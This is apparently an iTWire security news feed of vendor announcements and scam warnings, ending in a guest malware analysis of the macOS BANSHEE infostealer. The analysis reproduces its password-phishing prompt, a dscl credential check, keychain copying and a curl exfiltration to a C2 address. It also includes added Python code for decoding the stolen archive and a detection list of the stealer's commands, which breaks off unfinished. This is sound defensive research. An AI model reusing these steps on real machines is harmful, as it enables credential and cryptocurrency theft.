iTWire - Security https://itwire.com Thu, 12 Sep 2024 18:10:36 +1000

Multi-million-dollar Deepfake Campaigns blocked by Gen
https://itwire.com/security/multi-million-dollar-deepfake-campaigns-blocked-by-gen.html

Gen Quarterly Threat Report shows AI-fueled scams, digital identity attacks and ransomware dominating consumer cybersecurity landscape

COMPANY NEWS: Gen™ (NASDAQ: GEN), a global leader in consumer Cyber Safety with a family of brands, Norton, Avast, LifeLock, Avira, AVG, ReputationDefender and CCleaner, today released the Q2/2024 Gen Threat Report. The report spotlights the most notable cyberattacks targeting consumers from April to June 2024.

Gen experts warn that it is more important than ever to stay vigilant as cybercriminals increasingly use generative AI to create sophisticated scams using voices, images and videos to make their schemes more convincing. Attackers are using celebrities, global events, and brands as shiny lures. And as more people find themselves navigating economic hardships, the promise of easy money through phony investments, cryptocurrency giveaways and part-time job offers has also become a timely hook for scammers preying upon unsuspecting victims seeking financial security.

“We continue to see cybercriminals expand their toolkits with even more uses of AI to strengthen their attacks,” said Siggi Stefnisson, Chief Technology Officer at Gen.

“Scammers are cunning and adept at exploiting what is most likely to be on consumers’ minds – whether it has to do with elections, love or financial security. Now with AI and other new tech, their schemes are more sophisticated and convincing than ever before. We urge consumers to stay informed and alert. We will continue to keep a watchful eye on the latest threats and provide the latest knowledge and tools needed to be safer despite the evolving threat landscape.”

Gen has one of the world’s largest consumer Cyber Safety networks protecting people around the globe against advanced online threats. Throughout Q2, Gen Cyber Safety brands blocked over one billion unique attacks each month, up 46% compared to last year. Interestingly, a staggering 95% of attacks happen while people use their browser and surf the web. In addition to blocking threats directly as part of our customers’ products and services, Gen researchers discovered and reported security vulnerabilities so that they could be patched by other companies, helping protect people from further attacks.

Gen experts shared some of the most prevalent threats to watch for based on this quarter’s findings:

Scammers’ Playbook: New and Revamped Tactics
The accessibility and rise of AI allow cybercriminals to add a modern twist to their old tricks to lure more victims. We have seen bad actors using deepfakes of celebrities to promote fake cryptocurrency investment schemes, and now, scammers are targeting widely publicized events that will be broadcast live to draw a large audience.

For example, recently, scam group CryptoCore lured victims with highly convincing deepfakes of official events disseminated on compromised YouTube accounts and used QR codes to direct victims to fake crypto giveaway campaigns, stealing $5 million. During the SpaceX Starship integrated flight test (IFT-4) in June, nearly 50 YouTube accounts were hijacked, and the campaign resulted in 500 transactions amounting to a total value of $1.4 million. Gen products helped protect thousands of people from this threat in Q2, with the largest amounts in the US, UK, Brazil and Germany.

Amid challenging economic conditions, scammers are capitalizing on consumers’ needs with part-time job scams that promise quick money by completing simple tasks, like promoting goods on social media. Once trust is established, the scammers convince their victim to send them money so they can steal it. These scams have now evolved from text-based interactions on Telegram to more sophisticated AI-generated voice communications, adding a whole new layer of deception and realism.

This quarter saw the revival of the classic antivirus scam that was first popular in the late 2000s, when cybercriminals were making millions of dollars by selling fake antivirus products. Nowadays, cybercriminals deploy aggressive pop-up alerts that mimic real antivirus programs, often claiming the computer is infected to urge immediate action. These fake alerts abuse the Windows notification system to appear as credible system messages to scare the person into purchasing antivirus software so the scammers can earn commissions through third-party referral programs.

Digital Identity Theft: The New Gold Rush
As large-scale company breaches seemingly become the norm in 2024, cybercriminals turn an eye toward stealing digital identities. Attackers are using direct methods such as Information Stealers (InfoStealers) and Mobile Bankers, going beyond buying data on the Dark Web to snap up consumers’ valuable personal information.

InfoStealers breach devices to steal login details, session cookies, passwords and financial information. While InfoStealers saw a slight decline in Q2/2024, notable malware families continue to grow, with the most dominant, AgentTesla, increasing its market share by 11%.

Mobile bankers, on the other hand, specifically target mobile devices to steal banking details, cryptocurrency wallets, and instant payment credentials. In Q2/2024, bankers such as TeaBot, disguised as a PDF reader, targeted Revolut customers. Meanwhile, spyware threats such as XploitSpy and AridSpy are sneaking onto the Play Store, stealing files and monitoring users through their cameras and microphones.

Norton LifeLock provides a 12-step guide to help people if they believe their identity may have been compromised.

On the Rise: Consumer Ransomware
Consumers remain an attractive target for ransomware as they often have less protection in place than large companies. According to Gen telemetry, there was a 24% rise quarter over quarter in consumer ransomware attacks in Q2/2024. India saw a staggering 379% increase, followed by notable spikes in the United States, Canada and the United Kingdom.

A popular delivery technique is to hide ransomware payload in pirated content. Even though some operators of major ransomware gangs like LockBit have been brought to justice in the last quarter, Gen urges consumers to take precautions to keep their data safe, such as doing regular back-ups.

Gen researchers collaborate with governments across the globe to combat ransomware by providing free decryption tools for victims, and most recently released the Avast DoNex Ransomware Decryptor.

To read the full Q2/2024 Gen Threat Report, visit: https://www.gendigital.com/blog/news/innovation/q2-2024-threat-report

This marks the inaugural Gen Threat Report. Previously, Gen brands separately reported quarterly threat news with the Norton Pulse Report and Avast Quarterly Threat Report. The Gen Threat Report now offers a comprehensive look at the rising threats we monitor and protect our customers from each day and trends we see across the threat landscape.

About Gen
Gen™ (NASDAQ: GEN) is a global company dedicated to powering Digital Freedom through its trusted Cyber Safety brands, Norton, Avast, LifeLock, Avira, AVG, ReputationDefender and CCleaner. The Gen family of consumer brands is rooted in providing safety for the first digital generations. Now, Gen empowers people to live their digital lives safely, privately, and confidently today and for generations to come. Gen brings award-winning products and services in cybersecurity, online privacy and identity protection to nearly 500 million users in more than 150 countries. Learn more at GenDigital.com. 

stan.beer@itwire.com (Gen) Security Wed, 11 Sep 2024 15:31:04 +1000

Infoblox, Baidam launch fraudulent website takedown service
https://itwire.com/security/infoblox,-baidam-launch-fraudulent-website-takedown-service.html

Baidam CEO Jack Reis

Cloud networking and security services provider Infoblox and indigenous Australian ICT and cyber security provider Baidam launched Baidam Takedown Services, an Australian-first capability that can take down lookalike websites and scam domains within a week using the Domain Name System (DNS).

The takedown service weaves together Infoblox’s validation, mitigation, monitoring, and reporting features by using DNS to track, identify, confirm and remove websites.

Infoblox leverages rapid escalation, its DNS, and threat intelligence expertise, backed by its relationships with Australian and global internet service providers (ISPs), telcos, and domain administrators to achieve this.

This service can also track and remove stolen proprietary information – including access credentials, personally identifiable information, and credit card data – from online forums or fraudulent hosts.


Further, it can confirm the existence of potential malware and remove malicious files from organisations’ legitimate websites.

The services come as the Australian Competition and Consumer Commission’s (ACCC) National Anti-Scam Centre reported that Australians lost $2.74 billion to scams including investment, identity theft, and online shopping scams in 2023.

The companies devised the takedown service as more fraudulent websites are targeting Australians with investment scams.

This led the government to “boost work by the Australian Securities and Investments Commission to identify and take down investment scam websites.”

Baidam CEO Jack Reis says fraudulent domains are a rising threat for any organisation – from sole traders to major enterprises – but indigenous and regional businesses could be particularly vulnerable to internet fraud.

The ACCC report highlighted First Nations people reported almost double the number of scams in 2023 compared with 2022.

“There are parts of Australia where the internet is very new, or not available yet at all,” said Reis.

“It’s one of the most important resources we can bring to the bush, but lack of experience and education on cybersecurity and online scams can leave indigenous people and businesses more vulnerable.”

“Together with Infoblox, we’re committed to helping organisations across Australia maintain a secure and trustworthy online presence and quickly mitigate the impact of fraudulent or lookalike websites.”

Baidam Takedown Services operate out of the company’s Gundan Security Operations Centre (SOC) in Brisbane, Australia’s first indigenous-designed and managed SOC.

The centre was opened by Minister for Cyber Security Clare O’Neil and was built using an Indigenous co-design methodology. Baidam provides training and experience that offers pathways for First Nations people to become cyber leaders.

Infoblox Australia and New Zealand managing director Scott Morris said internet fraud can be the spark that ignites other malicious activity, including ransomware, as stolen credentials taken through fake websites, imitated multi-factor authentication (MFA) prompts and phishing campaigns are often used to conduct these attacks.

“We’re seeing internet fraud playing a more prominent role in how cybercriminals infiltrate organisations in Australia,” said Morris.

“Our takedown service helps companies neutralise fraudulent domains impersonating them for criminal activities. While blocking malicious domains should be a priority for every user, this takedown service lets companies become proactive in defending their good name and customers.”

Baidam’s Infoblox-supported Takedown Services are available across Australia now. Organisations can purchase or pre-purchase “packs” of takedowns for current or future suspected fraudulent websites and domains.

stan.beer@itwire.com (Kenn Anthony Mendoza) Security Mon, 09 Sep 2024 09:34:27 +1000

Empowering the Next Generation: KnowBe4 Releases its Children’s Interactive Cybersecurity Activity Kit
https://itwire.com/security/empowering-the-next-generation-knowbe4-releases-its-children%E2%80%99s-interactive-cybersecurity-activity-kit.html

This kit aims to make cybersecurity education for children more accessible

KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, announced its latest release of the KnowBe4 Children’s Interactive Cybersecurity Activity Kit. In an increasingly digital world, cybersecurity education for children is more crucial than ever. This kit, aimed at students under the age of 16, provides essential tools and resources to help keep children safe online and is available at no charge.

The kit includes an AI safety video, a password video game, a cybersecurity activity book, and middle school lesson plans. The kit also includes a Roblox game called KnowBe4 Hack-A-Cat, which teaches students about things like phishing, ransomware, and other cybersecurity-related topics. 

This year, KnowBe4 has added a lesson “Hack-A-Cat: Your Cybersecurity Adventure on Roblox”, to accompany the game and assist educators in explaining concepts contained in it in a more direct way. The module can be completed by students in their own time or used as a lesson in the classroom by teachers. 

"We are committed to continually improving our cybersecurity education resources for children," said John Just, chief learning officer at KnowBe4. "The excitement around our Roblox game prompted educators to request an accompanying lesson. We're thrilled to add this to our Children's Kit, enhancing its value for students worldwide. These updates reflect our dedication to providing engaging, relevant, and effective cybersecurity training for children."

In addition to the new module, the kit also has a new feature. Users are now able to download its content in a common standard called Shareable Content Object Reference Model (SCORM) and use it as part of their own Learning Management Systems (LMS) and/or Virtual Learning Environments (VLE).

Modules available include:

  • AI Awareness for Students
  • Bye Bye Bully 
  • Captain Awareness: Conquer Internet Safety for Kids
  • Password Zapper Game
  • Spot the Phish - Kid's Edition

Supporting materials available in image and document formats available for download include:

  • Clickbait Cootie Catcher Tabletop Exercise
  • Password Warriors Tabletop Exercise
  • Poster: Captain Awareness: Conquer Internet Safety for Kids
  • Security Cat's Activity Book for Kids

KnowBe4 remains committed to expanding the Children's Kit and Student Edition throughout the school year, based on the latest threats and feedback from partner institutions.

The KnowBe4 Children’s Interactive Cybersecurity Activity Kit is freely available to students under the age of 16, schools, teachers, and parents here.

stan.beer@itwire.com (KnowBe4) Security Wed, 04 Sep 2024 10:49:21 +1000

CyberArk Named Trusted Cloud Provider by Cloud Security Alliance
https://itwire.com/security/cyberark-named-trusted-cloud-provider-by-cloud-security-alliance.html

COMPANY NEWS: CyberArk (NASDAQ: CYBR), the identity security company, today announced that it has earned the Trusted Cloud Provider trustmark from the Cloud Security Alliance (CSA), the world’s leading organisation dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment. The Trusted Cloud Provider trustmark helps organisations to identify providers that have invested to achieve the highest standards of cloud security in their product offerings.

“This internationally-recognised certification from CSA reaffirms CyberArk’s cloud security commitment to organisations across the world,” said Clarence Hinton, chief strategy officer at CyberArk. “CyberArk innovation goes beyond just-in-time access, offering zero standing privileges capabilities for multi-cloud environments. The identity security platform streamlines and safeguards workforce and high-risk user access, like developers, locks down endpoint privileges and protects human and machine credentials in all environments.”

CSA is the world’s leading organisation focused on defining and raising awareness about best practices to ensure a secure cloud computing environment. Organisations across the globe recognise the increasing urgency around securing their multi-cloud environments as well as the cloud-based solutions they consume. In a dynamic, AI-powered threat landscape, the Trusted Cloud Provider trustmark is a mark of CyberArk’s identity security leadership and our mission to enable customers to stay ahead of well-funded, innovative cyberattackers by rethinking and modernising the way in which we secure all identities, both human and machine, with intelligent privilege controls.

“Attaining the CSA Trusted Cloud Provider trustmark is a major accomplishment, showcasing an organisation’s commitment to upholding the highest standards in cloud security,” said Jim Reavis, co-founder and CEO of the Cloud Security Alliance. “CyberArk not only meets these stringent requirements but surpasses them, helping customers secure increasingly complex cloud environments.” 

stan.beer@itwire.com (CyberArk) Security Tue, 03 Sep 2024 09:52:49 +1000

ACMA alerts the public to be vigilant against romance scams
https://itwire.com/security/acma-alerts-the-public-to-be-vigilant-against-romance-scams.html

The Australian Communications and Media Authority (ACMA) has warned the public to be vigilant about messages from strangers trying to start a conversation, or messages that lure people into a relationship, as they may be a scam.

This Scams Awareness Week, the ACMA warns the public to be on the lookout for love scams as scammers continue to target people by initiating contact to build a connection.

Scammers will contact people via different channels, including Instant Message on social media, WhatsApp, email, and SMS.

“They will then try and develop a relationship with you over time, pretending to be romantically or otherwise interested in you to gain your trust. These scams are designed to get you to provide money or personal information,” the ACMA said in a statement.


The ACMA gave the signs of a romance or relationship scam:

- A stranger connects with someone and sends a message that seems to be an accident, then introduces themselves and tries to start a conversation.

- The contact becomes frequent and intimate – the scammer may make contact multiple times a day and express strong feelings. They may ask victims to provide personal or intimate images that may later be used to coerce them into paying money.

- They ask victims to send or invest money. The scammer may claim that they need money due to an emergency or try to convince them to invest to make easy money.

- They try to get victims to click on a link to connect with them – these links will often have unusual or unfamiliar domain names and may lead to a fake website or contain malware designed to help steal victims’ personal or financial details.

The ACMA gave tips on how people can protect themselves:

- If you are unsure whether a message or call is genuine, stop and check. Don’t rush to act.

- Do not give your personal information or send money to someone you haven’t met in person and don’t know.

- Do not click on any links in emails or texts. These may contain malware or may be phishing scams designed to steal your personal or financial details.

- Check in with family members and/or friends you trust to talk about any online request for money.

- If you think you’ve been scammed, contact your bank immediately to stop any payments and tell your telco.

stan.beer@itwire.com (Kenn Anthony Mendoza) Security Thu, 29 Aug 2024 10:41:41 +1000

Nozomi Networks collaborates with Mandiant to deliver a ‘comprehensive solution’ for OT, IT and IoT threat detection and response
https://itwire.com/security/nozomi-networks-collaborates-with-mandiant-to-deliver-a-%E2%80%98comprehensive-solution%E2%80%99-for-ot%2C-it-and-iot-threat-detection-and-response.html

OT and Internet of Things (IoT) company Nozomi Networks has announced the general availability of the Nozomi TI Expansion Pack, powered by Mandiant Threat Intelligence.

Nozomi Networks says the federated solution helps strengthen and streamline the way industrial and enterprise CISOs and their teams anticipate, diagnose and respond to cyber threats across all their critical business operations.

“With the Nozomi TI Expansion Pack, Nozomi Networks customers now have the option to enrich Nozomi Networks threat intelligence with Mandiant Threat Intelligence to gain more comprehensive access to real-time information about threats to their IT, OT and IoT systems,” notes Nozomi.

“The cybersecurity threat landscape is rapidly evolving, with attacks growing in both number and impact enterprise-wide,” said Edgard Capdevielle, Nozomi Networks CEO.


“To minimise risk and maximise operational resilience, CISOs and their security teams need comprehensive solutions that enable them to quickly assess and respond to threats across their IT, OT and IoT systems. We are pleased to be able to give our customers the option to easily incorporate Mandiant’s world-class threat intelligence as part of a whole solution that delivers superior security outcomes.”

“For nearly a decade, Mandiant and Nozomi Networks have partnered to deliver advanced, AI-powered OT and IoT security solutions to customers,” said Melissa Smith, Google Cloud’s Head of Strategy & Technology Partnerships.

“This latest expansion is another critical step in our journey to combine threat intelligence sources and defences to deliver the best possible security outcomes for the world’s critical infrastructure. By blending Mandiant’s threat intelligence and expertise with Nozomi Networks’ OT threat intelligence and tools, we can enable critical infrastructure organisations to enhance their threat intelligence and investigations for a stronger defence.”

According to Nozomi Networks, customers who wish to gain comprehensive access to real-time information about threats to their IT, OT and IoT systems now have access to an “integrated threat feed that combines the breadth and depth of Mandiant’s threat intelligence with Nozomi Networks’ industry-leading OT threat intelligence.

“The Nozomi TI Expansion Pack extends Nozomi Networks’ advanced OT and IoT threat intelligence by providing organisations with a deeper understanding of the coinciding IT threat landscape. This makes it possible to holistically monitor and respond to emerging threats for the strongest possible security outcomes.”

Vantage Threat Cards, also announced today, are a new presentation capability in Nozomi Vantage, the company’s cloud-based OT/IoT cyber management console. Vantage Threat Cards revolutionise the way users access and derive value from threat intelligence feeds. These cards logically cluster and organise threat data, offering instant access to critical information such as:

  • Threat descriptions
  • First and last seen dates
  • Exploitation status and vectors
  • Targeted industries and countries
  • MITRE ATT&CK details
  • Mitigation suggestions
  • And more

Nozomi says users can swiftly narrow down threats by filtering based on specific countries and regions, ensuring they receive the most relevant information for their needs.

“Vantage Threat Cards empower OT and IoT cyber teams to quickly scan and filter key threat information, significantly speeding up response times and enhancing accuracy. Analysts can easily input an IP address, domain name, hash, or threat actor alias to identify any associated rules, streamlining the identification process. The integration of Mandiant Threat Intelligence will be used throughout the Vantage solution to enhance our offering even further.” Updates to the vulnerability data include:

  • Improved CVSS mapping
  • Detailed summaries
  • Lists of vulnerable products
  • Exploitation details
  • MITRE ATT&CK details
  • Workarounds and vendor fixes
  • Links back to Threat Cards and malware groups

Nozomi notes that these enhancements ensure comprehensive coverage and deeper insights into vulnerabilities, enabling more effective threat management. The TI Expansion Pack is available now for customers using Nozomi on-premises and cloud-based monitoring solutions, while Vantage customers have the added benefit of accessing the new threat intelligence feed through Nozomi Threat Cards.

The Nozomi TI Expansion Pack and Vantage Threat Intelligence Cards are available now. Sign up for our webinar to get more information. 

stan.beer@itwire.com (Gordon Peters) Security Thu, 29 Aug 2024 10:10:20 +1000

Elastic ‘expedites SecOps tasks’ with LangChain
https://itwire.com/security/elastic-%E2%80%98expedites-secops-tasks%E2%80%99-with-langchain.html

Elastic, the Search AI Company, is collaborating with LangChain, the de facto generative AI orchestration library, to build and deliver AI capabilities that “expedite labor-intensive” SecOps tasks.

Elastic says the collaboration with LangChain has been core to the development of three Elastic Security features, Automatic Import, Attack Discovery and Elastic AI Assistant for Security, on the Elastic Search AI Platform. The features streamline user migration to AI-driven security analytics and expedite security operations workflows.

"Working with Elastic has been amazing in so many ways. The Elastic AI Assistant for Security, powered by LangChain's standard large language model (LLM) interfaces and instrumented using LangSmith, has successfully deployed to production, reaching hundreds of users,” said Erick Friis, founding engineer at LangChain.

“Elastic is also using LangGraph to build more controllable agents. It's inspiring to see how our shared users have embraced similar retrieval workflows on their Elastic deployments.”


Elastic Security notes that the integration with LangChain leverages two key components. LangChain and LangGraph provide the necessary tools for building applications that require context-aware reasoning, such as:

  • Enhancing Elastic AI Assistant’s ability to understand and react to complex security scenarios and generate queries
  • Attack Discovery’s ability to identify and describe attacks
  • Automatic Import’s ability to craft an accurate data integration based on sample data

Users have the freedom to integrate the generative AI features of Elastic Security with their LLM of choice. With the Elastic Open Inference API and LangChain’s extensive chat model ecosystem, Elastic is quickly expanding customers’ LLM options.

“Elastic is focused on delivering innovative AI features for security teams to accelerate their migration from legacy SIEM and free up teams from traditionally time-consuming, complex and mundane tasks,” said Mike Nichols, vice president of product, Security at Elastic.

“Through our close relationship with LangChain and integrations with LangGraph and LangSmith, we’ve created features that give valuable time back to security practitioners.”

Read the Elastic blog for more information on Elastic’s work with LangChain.

About Elastic

Elastic (NYSE: ESTC), the Search AI Company, enables everyone to find the answers they need in real time using all their data, at scale. Elastic’s solutions for search, observability and security are built on the Elastic Search AI Platform, the development platform used by thousands of companies, including more than 50% of the Fortune 500. Learn more at elastic.co.

stan.beer@itwire.com (Gordon Peters) Security Tue, 27 Aug 2024 10:33:18 +1000

It’s Scams Awareness Week – stop, check and report: ACMA
https://itwire.com/security/it%E2%80%99s-scams-awareness-week-%E2%80%93-stop%2C-check-and-report-acma.html

Almost everyone has come across a scam and this year, Scams Awareness Week (26-30 August) is encouraging Australians to share their story to help stop scams.

The Australian Communications and Media Authority (ACMA) notes in its Scam Alert that if you’ve identified or encountered a scam, report it to www.scamwatch.gov.au, and then tell someone – a friend, family member, colleague or someone in your social circle.

“By sharing your story, you can help to prevent someone else from having their money or personal information taken by a scammer,” cautions the ACMA.

Remember to:

  • Stop: Don’t give money or personal information to anyone if unsure. Say no, hang up, delete.
  • Check: Scammers pretend to be from organisations you know and trust – like myGov, your bank, the police or government. If you’re unsure, contact the organisation using details you’ve looked up yourself via an official website or app.
  • Report: The more we talk, the less power they have. Report scams to scamwatch.gov.au when you see them.

Scams Awareness Week is an annual campaign hosted by the ACCC and the Scams Awareness Network and supported by the ACMA. It raises awareness about common scams and offers tips on how people can protect themselves from scammers.

Keep an eye on our Facebook, X and LinkedIn channels this week as we share tips on how to protect yourself from scams. You can also visit the Scams Awareness Week website for more information.

stan.beer@itwire.com (ACMA) Security Mon, 26 Aug 2024 13:09:32 +1000

CSIRO teams up with Google to secure Australian critical infrastructure
https://itwire.com/security/csiro-teams-up-with-google-to-secure-australian-critical-infrastructure.html

Australian national science agency CSIRO and tech giant Google announced a research partnership to close crucial gaps in how Australia’s critical infrastructure (CI) operators find, understand, and fix vulnerabilities in their software supply chains.

Google and CSIRO will develop tools and frameworks that help Australian CI operators meet critical obligations around software supply chain security, including those in the amended Security of Critical Infrastructure (SOCI) Act and Australia’s Cyber Security Strategy.

The partnership is a part of Google’s Digital Future Initiative and CSIRO’s developing Critical Infrastructure Protection and Resilience mission.

The tools and frameworks will focus on identifying and fixing vulnerabilities in open source software components that have become an increasingly important part of digital transformation for Australia’s critical infrastructure, which includes everything from public utilities and hospitals to freight networks and groceries.


All project findings will be publicly available, allowing critical infrastructure sectors free and easy access.

CSIRO project lead Dr Ejaz Ahmed says the creation of new and homegrown technologies will enhance the security of software used in Australian critical infrastructure.

“Software developed, procured, commissioned, and maintained within Australia will also be better aligned with local regulations, promoting greater compliance and trustworthiness,” Dr Ahmed says.

“This partnership builds upon a successful track record of AI-powered innovation, demonstrating the transformative power of Google and CSIRO's expertise.”

A roadmap to more secure software
The partnership will see CSIRO work with the Google Open Source Security Team (GOSST) and Google Cloud to develop novel AI-powered tools for automated vulnerability scanners and data protocols that can quickly and precisely identify and assess the impact of open source vulnerabilities on Australian CI operators’ software supply chains.

The tools will tap into existing resources, including Google’s OSV database, for the most up-to-date intelligence on vulnerabilities. CSIRO’s applied research, including methods to test for responsible AI usage and tools for analysing software packages, will help to ensure reports and recommendations directly address the local regulatory and operating context of Australian operators.

Similarly, CSIRO and Google will collaborate on designing a secure framework that gives Australian CI operators clear guidance on how to meet current requirements and a baseline for future ones.

The framework will adapt and extend the Supply-chain Levels for Software Artifacts (SLSA) framework created by Google, with insight from CSIRO’s Australian industry practices, to define multiple levels of software supply chain maturity as well as steps to achieve each one.

Google Cloud will provide solutions, including machine learning and Big Data capabilities as well as domain-specific large language models, to accelerate the partnership’s research and translate it into tools or as-a-service offerings for CI operators.

“Software supply chain vulnerabilities are a global issue, and Australia has led the way in legislative measures to control and combat the risks," says Google Cloud security practice lead ANZ Stefan Avgoustakis.

“The tools and frameworks we’re developing will give Australia’s CI operators a clear and consistent roadmap towards software supply chain maturity, based on the in-depth industry knowledge that CSIRO has built up over years of research. Making these resources openly available to CI operators will help establish greater resilience throughout critical infrastructure nationwide, and reflects our longstanding interest in teaming up with industry and academia to enhance the effectiveness of our years of work in open source security.”

]]>
stan.beer@itwire.com (Kenn Anthony Mendoza) Security Thu, 22 Aug 2024 09:36:46 +1000
Beyond the wail: deconstructing the BANSHEE infostealer https://itwire.com/security/beyond-the-wail-deconstructing-the-banshee-infostealer.html https://itwire.com/security/beyond-the-wail-deconstructing-the-banshee-infostealer.html Beyond the wail: deconstructing the BANSHEE infostealer

GUEST RESEARCH - The BANSHEE malware is a macOS-based infostealer that targets system information, browser data, and cryptocurrency wallets.

Preamble

In August 2024, a novel macOS malware named "BANSHEE Stealer" emerged, catching the attention of the cybersecurity community. Reportedly developed by Russian threat actors, BANSHEE Stealer was introduced on an underground forum and is designed to function across both macOS x86_64 and ARM64 architectures.

This malware presents a severe risk to macOS users, targeting vital system information, browser data, and cryptocurrency wallets.

With a steep monthly subscription price of $3,000, BANSHEE Stealer stands out in the market, particularly compared to known stealers like AgentTesla.

As macOS increasingly becomes a prime target for cybercriminals, BANSHEE Stealer underscores the rising prevalence of macOS-specific malware. This analysis explores the technical details of BANSHEE Stealer, aiming to help the community understand its impact and stay informed about emerging threats.

Key takeaways

  • BANSHEE Stealer highlights the growing number of macOS malware samples as the OS becomes a more attractive target for cyber threats.
  • BANSHEE Stealer's $3,000 monthly price is notably high compared to Windows-based stealers.
  • BANSHEE Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat.

Malware Analysis 

The sample we analysed in this research retained all of its C++ symbols, which is interesting because the source file names they expose let us infer the project's code structure, as seen in the picture below. Looking into the C++-generated global variable initialisation functions, we can find values set automatically or manually during the build process, such as the remote IP, encryption key, build ID, etc.

Figure 2: Functions list that initialise the global variables of every source file

The following table summarises the leaked .cpp file names through the symbols in the binary.

  • Controller.cpp: Manages core execution tasks, including anti-debugging measures, language checks, data collection, and exfiltration.
  • Browsers.cpp: Handles the collection of data from various web browsers.
  • System.cpp: Executes AppleScripts to gather system information and perform password phishing.
  • Tools.cpp: Provides utility functions for encryption, directory creation, compression, etc.
  • Wallets.cpp: Responsible for collecting data from cryptocurrency wallets.

Debugger, VM Detection, and Language Checks

Figure 3: Checking for debugging, virtualisation, and the language of the machine

 

BANSHEE Stealer uses basic techniques to evade detection. It detects debugging by utilising the sysctl API.

Figure 4: Debugging detection with the sysctl macOS API

For virtualisation detection, it runs the command system_profiler SPHardwareDataType | grep 'Model Identifier' to determine whether the string Virtual appears in the hardware model identifier, which suggests a virtual machine. These methods are relatively simple and can be easily circumvented by advanced sandboxes and malware analysts.

Figure 5: Virtual machine check

Additionally, it parses the user-preferred canonicalised language returned from the CFLocaleCopyPreferredLanguages API and looks for the string ru. This tactic helps the malware avoid infecting systems where Russian is the primary language.

System information collection 

User password 

The malware creates an osascript password prompt whose dialog says: "To launch the application, you need to update the system settings. Please enter your password."

When the user enters the password, it is validated with the dscl command by running dscl Local/Default -authonly <username> <password>.

If valid, the password is written to the following file: /Users/<username>/password-entered.

Figure 6: User password phishing through a prompt

These credentials can be leveraged to decrypt the keychain data stored on the system, granting access to all saved passwords.

File, software, and hardware information collection 

The function System::collectSystemInfo collects system information and serialises it in a JSON object. It executes the command system_profiler SPSoftwareDataType SPHardwareDataType, which provides details about the system’s software and hardware. It gets the machine's public IP by requesting it from freeipapi.com through the built-in macOS cURL command.

The JSON file is saved under <temporary_path>/system_info.json.

BANSHEE stealer executes AppleScripts; interestingly, it writes the AppleScripts to the same file /tmp/tempAppleScript.

The first script to be executed mutes the system sound with the command osascript -e 'set volume with output muted'. It then collects various files from the system, which are listed below:

  • Safari cookies
  • Notes database
  • Files with the extensions .txt, .docx, .rtf, .doc, .wallet, .keys, or .key from the Desktop and Documents folders.

Dump keychain passwords 

It copies the system keychain /Library/Keychains/login.keychain-db to <temporary_path>/Passwords.

Browser collection 

BANSHEE collects data from 9 different browsers currently, including browser history, cookies, logins, etc:

  • Chrome
  • Firefox
  • Brave
  • Edge
  • Vivaldi
  • Yandex
  • Opera
  • OperaGX

For Safari, the current version collects only the cookies, via the AppleScript described above.

Figure 7: Web browser file collection

Additionally, data from approximately 100 browser extensions is collected from the machine. A list of these extension IDs is provided at the end of the blog post.

The collected files are saved under <temporary_path>/Browsers.

Wallet collection

  • Exodus
  • Electrum
  • Coinomi
  • Guarda
  • Wasabi Wallet
  • Atomic
  • Ledger

The collected wallets are stored under <temporary_path>/Wallets.

Exfiltration 

After the malware finishes collecting data, it first ZIP-compresses the temporary folder using the ditto command. The zip file is then XOR-encrypted and base64-encoded and sent through a POST request to the URL https://45.142.122[.]92/send/ with the built-in cURL command.

Figure 8: XOR and base64 encoding of the zip file to be exfiltrated
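As an added example (not code from Elastic's post), the following Python reverses the scheme just described on a captured POST body: base64-decode, XOR with the build key, and check that the result is a ZIP before unpacking the file list. It also shows why the scheme is weak for the attacker: a ZIP always starts with the bytes PK\x03\x04, so the first key bytes fall out of the ciphertext as known plaintext. The sample body and the two-byte key are constructed here; a real key would be read from the sample's initialiser functions as described earlier.

```python
import base64
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"  # local file header that opens every ZIP archive


def xor_bytes(data, key):
    """XOR data against a repeating key (the page describes the scheme, not the key)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_exfil_body(b64_body, key):
    """Reverse base64 + XOR on a captured POST body; return ZIP bytes or raise."""
    raw = xor_bytes(base64.b64decode(b64_body), key)
    if not raw.startswith(ZIP_MAGIC):
        raise ValueError("decoded data is not a ZIP archive; wrong key?")
    return raw


def recover_key_prefix(b64_body):
    """Known-plaintext attack on the encoding: the first four plaintext bytes are
    ZIP_MAGIC, so ciphertext[0:4] XOR ZIP_MAGIC yields key[0:4] (the full key,
    repeated, when the key is four bytes or shorter)."""
    return xor_bytes(base64.b64decode(b64_body)[:4], ZIP_MAGIC)


def list_stolen_files(zip_bytes):
    """Names of the files inside the recovered archive, sorted for stable output."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(zf.namelist())


def build_sample_body(key):
    """Constructed stand-in for a captured request body: a tiny ZIP laid out like
    the temporary folder described above, XOR-ed and base64-encoded the same way."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("system_info.json", '{"hostname": "example-mac"}')  # constructed
        zf.writestr("Browsers/Chrome/Cookies", b"constructed placeholder")
    return base64.b64encode(xor_bytes(buf.getvalue(), key)).decode("ascii")


SAMPLE_KEY = b"\x5a\xa5"  # placeholder key for the example, not a real build key
SAMPLE_BODY = build_sample_body(SAMPLE_KEY)
```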

Behavior detection
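Added example, not part of Elastic's research: a minimal behavioural detection over constructed process-execution events that scores, per parent process, the command chain described in the analysis (the system_profiler VM check, the osascript temp file, dscl -authonly, the system_profiler hardware and software dump, the freeipapi.com lookup, the ditto ZIP step and the curl POST to /send/). The event format, PIDs, paths and password are assumptions made for this example; any one of these commands alone is ordinary admin activity, so the rule fires only when several distinct steps share one parent.

```python
import re

# Constructed process events (not real telemetry), one per line, in the shape
# "<ts> pid=<n> ppid=<n> cmd=<command line>". PIDs, paths and the password are made up.
SAMPLE_EVENTS = [
    "2024-08-13T10:00:01Z pid=501 ppid=400 cmd=system_profiler SPHardwareDataType | grep 'Model Identifier'",
    "2024-08-13T10:00:02Z pid=502 ppid=400 cmd=osascript /tmp/tempAppleScript",
    "2024-08-13T10:00:05Z pid=503 ppid=400 cmd=dscl Local/Default -authonly alice Pa55word",
    "2024-08-13T10:00:06Z pid=504 ppid=400 cmd=system_profiler SPSoftwareDataType SPHardwareDataType",
    "2024-08-13T10:00:07Z pid=505 ppid=400 cmd=curl -s https://freeipapi.com/",
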